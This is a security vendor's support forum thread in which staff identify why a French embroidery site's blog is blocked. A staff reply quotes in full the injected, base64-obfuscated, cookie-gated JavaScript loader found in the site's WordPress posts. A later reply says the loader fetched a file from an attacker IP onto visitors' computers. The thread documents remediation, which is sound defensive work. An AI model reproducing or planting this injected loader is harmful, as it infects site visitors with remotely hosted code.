BenoitCHOPLIN Posted September 29, 2020 ID:1410570 Share Posted September 29, 2020 Helo, Our website seems to be wrongly blocked by your realtime website scan engine, despite a clean report on virustotal and with immunifyAV on our hosted server, as well as various online website scanning tools. Blocking is not immediate and happens after about 1 hour of surfing. It was reported by one customer (only, so far) and we managed to reproduce it on our own computers. Here is the information : URL : https://www.creatricesbroderiemachine.com/ Server IP : 85.236.155.161 Malwarebytes Screenshots attached as well as report mb.txt Link to post Share on other sites More sharing options...
Staff Solution Dashke Posted September 29, 2020 Staff Solution ID:1410575 Share Posted September 29, 2020 Please check your website for a suspicious code - <p> <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs="></script><script src="./3 façons créatives d’utiliser des restes de tissu et broder durablement – Le mag CBM_files/5cw2fk"></script> <!--/codes_iframe--></p> Link to post Share on other sites More sharing options...
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410577 Share Posted September 29, 2020 I'm sorry, but I can't find this one. Any more details please ? Link to post Share on other sites More sharing options...
Staff Dashke Posted September 29, 2020 Staff ID:1410578 Share Posted September 29, 2020 Please check this link for example - creatricesbroderiemachine.com/blog/2017/05/06/3-facons-creatives-dutiliser-des-restes-de-tissu-et-broder-durablement Link to post Share on other sites More sharing options...
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410580 Share Posted September 29, 2020 OK, found it too at the same time. This is from ou wordpress associated blog, not from the main website itself, which explains why we didn't find anything. Thanks pointing at this so quickly. As soon as I fix it, what's next regarding MB flagging ? Link to post Share on other sites More sharing options...
Staff Dashke Posted September 29, 2020 Staff ID:1410581 Share Posted September 29, 2020 When you remove the malicious script, please let me know in this threat and I will remove the block after inspecting the website. Link to post Share on other sites More sharing options...
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410583 Share Posted September 29, 2020 OK. I cleaned up all the posts with the malicious code and checked all potential other locations. Everything should be fine now. BTW : do you have any idea of what this code was actually doing ? Link to post Share on other sites More sharing options...
Staff Dashke Posted September 29, 2020 Staff ID:1410585 Share Posted September 29, 2020 9 minutes ago, BenoitCHOPLIN said: OK. I cleaned up all the posts with the malicious code and checked all potential other locations. Everything should be fine now. BTW : do you have any idea of what this code was actually doing ? It would pull a file from http://185.156.177.85/5cw2fk on customer's computer. Thanks, the block will be removed soon. Link to post Share on other sites More sharing options...
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410588 Share Posted September 29, 2020 Thank you very much ! Link to post Share on other sites More sharing options...
Staff Dashke Posted September 29, 2020 Staff ID:1410589 Share Posted September 29, 2020 7 minutes ago, BenoitCHOPLIN said: Thank you very much ! You are always welcome! The block has been removed from the next update. Wish you a great day! Link to post Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now